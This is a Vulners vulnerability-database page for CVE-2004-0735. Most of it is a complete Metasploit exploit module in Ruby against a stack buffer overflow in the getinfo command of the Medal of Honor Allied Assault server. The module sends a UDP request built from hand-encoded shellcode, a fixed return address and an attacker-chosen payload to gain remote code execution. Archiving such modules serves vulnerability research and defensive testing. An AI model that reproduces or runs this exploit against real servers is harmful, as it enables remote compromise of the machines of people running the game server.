Vulners
Lucene search
Medal of Honor Allied Assault getinfo Stack Buffer Overflow
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2004-0735 | 9 May 201000:00 | – | circl |
 | CVE-2004-0735 | 23 Jul 200404:00 | – | cve |
 | CVE-2004-0735 | 23 Jul 200404:00 | – | cvelist |
 | Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit) | 9 May 201000:00 | – | exploitdb |
 | Medal of Honor Multiple Remote Overflows | 10 Aug 200400:00 | – | nessus |
 | CVE-2004-0735 | 27 Jul 200404:00 | – | nvd |
 | Medal Of Honor Allied Assault getinfo Stack Overflow | 26 Nov 200900:00 | – | packetstorm |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Medal of Honor Allied Assault getinfo Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the getinfo
command of Medal Of Honor Allied Assault.
},
'Author' => [ 'Jacopo Cervini' ],
'License' => BSD_LICENSE,
'References' =>
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
[ 'EDB', '357'],
[ 'BID', '10743'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
],
'DisclosureDate' => '2004-07-17',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12203)
])
end
def exploit
connect_udp
# We should convert this to metasm - Patrick
buf = 'B' * target['Rets'][0]
buf << "\x68\x76\x76\x76\x76"*9 # PUSH 76767676 x 9
buf << "\x68\x7f\x7f\x7f\x7f" # PUSH 7F7F7F7F
buf << "\x57" # PUSH EDI
buf << "\x58" # POP EAX
buf << "\x32\x64\x24\x24" # XOR AH,BYTE PTR SS:[ESP+24]
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x48"*150 # DEC EAX x 150
buf << "\x50\x50" # PUSH EAX x 2
buf << "\x53" # PUSH EBX
buf << "\x58" # POP EAX
buf << "\x51" # PUSH ECX
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x6a\x7f" # PUSH 7F
buf << "\x5e" # POP ESI
buf << "\x46"*37 # INC ESI
buf << "\x56"*10 # PUSH ESI
buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24]
buf << "\x49\x49" # DEC ECX
buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX
buf << "\x58"*11 # POP EAX
buf << "\x42"*66
buf << "\x3c"*4
buf << "\x42"*48
buf << [ target['Rets'][1] ].pack('V')
req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
req << "\r\n\r\n" + make_nops(32) + payload.encoded
udp_sock.put(req)
handler
disconnect_udp
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.9High risk
Vulners AI Score7.9
CVSS 27.5
EPSS0.62108